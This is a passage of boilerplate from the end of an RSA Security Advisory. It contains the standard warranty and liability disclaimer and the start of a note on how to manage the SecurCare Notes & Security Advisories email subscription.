distribute RSA Security Advisories in order to bring to the attention of users 
of the affected RSA products, important security information.  RSA recommends 
that all users determine the applicability of this information to their 
individual situations and take appropriate action.   The information set forth 
herein is provided "as is" without warranty of any kind.   RSA disclaims all 
warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement.  
In no event shall RSA, its affiliates or its suppliers, be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if RSA, its affiliates or its 
suppliers have been advised of the possibility of such damages.  Some 
jurisdictions do not allow the exclusion or limitation of liability for 
consequential or incidental damages, so the foregoing limitation may not apply.

About RSA SecurCare Notes & Security Advisories Subscription
RSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA 
sends you based on the RSA product family you currently use. If you’d like to 
stop receiving RSA SecurCare Notes & Security Advisories, or if you’d like to 
change which RSA product family Notes & Security Advisories you